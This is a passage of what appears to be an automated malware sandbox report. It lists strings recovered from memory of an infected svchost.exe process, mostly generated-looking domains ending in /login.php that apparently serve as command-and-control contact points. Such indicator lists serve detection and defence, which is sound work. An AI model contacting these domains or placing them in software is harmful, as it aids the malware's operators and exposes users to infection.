    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599822074.000000000721A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumytyq.com/login.php3
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477822370.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywaq.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2859466361.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980934633.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywov.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywov.com/login.phpg
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pumywug.com/login.php
    Source: svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyboq.com/http://vonypyf.com/http://qetyvil.com/www.sedoparking.com
    Source: svchost.exe, 00000001.00000002.2979374488.0000000007200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2229330427.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2206110408.0000000007253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2205792310.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204539292.000000000BE78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydeq.com/login.php
    Source: svchost.exe, 00000001.00000002.2979374488.0000000007200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydeq.com/login.phpC:
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupydig.com/login.php
    Source: svchost.exe, 00000001.00000003.2799462732.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupygel.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupylug.com/login.php
    Source: svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupymyp.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770277395.000000000734E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2782047194.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502438422.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477371501.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupypiv.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867200326.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyteg.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyteg.com/login.phpe
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508047808.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795645814.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupywog.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545922142.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxal.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxup.com/
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxup.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxuq.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pupyxuq.com/login.php3
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598911695.0000000007334000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purycaq.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylev.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477822370.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylev.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purylup.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2533383736.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytov.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyg.com/
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purytyp.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywoq.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557869409.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574431699.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557409030.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywyl.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purywyl.com/login.php3
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvycip.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvydyp.com/login.php8
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2645801459.000000000BE1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974475260.0000000000885000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvygyv.com/login.php
    Source: svchost.exe, 00000001.00000003.2855136666.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855135066.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855945770.000000000BEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjiq.com/http://galyfez.com/http://lyxygur.com/http://puvyjiq.com/http://lygyvon.com/http:
    Source: svchost.exe, 00000001.00000003.2855136666.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855135066.000000000BEFA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855945770.000000000BEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjiq.com/http://lyrytyx.com/
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613870670.000000000BEC4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617620564.000000000BEC5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjiq.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2762449108.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2763511659.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvyjop.com/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613424581.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2609160603.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621772308.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613994929.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2614481255.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puvymug.com/login.php
    Source: svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 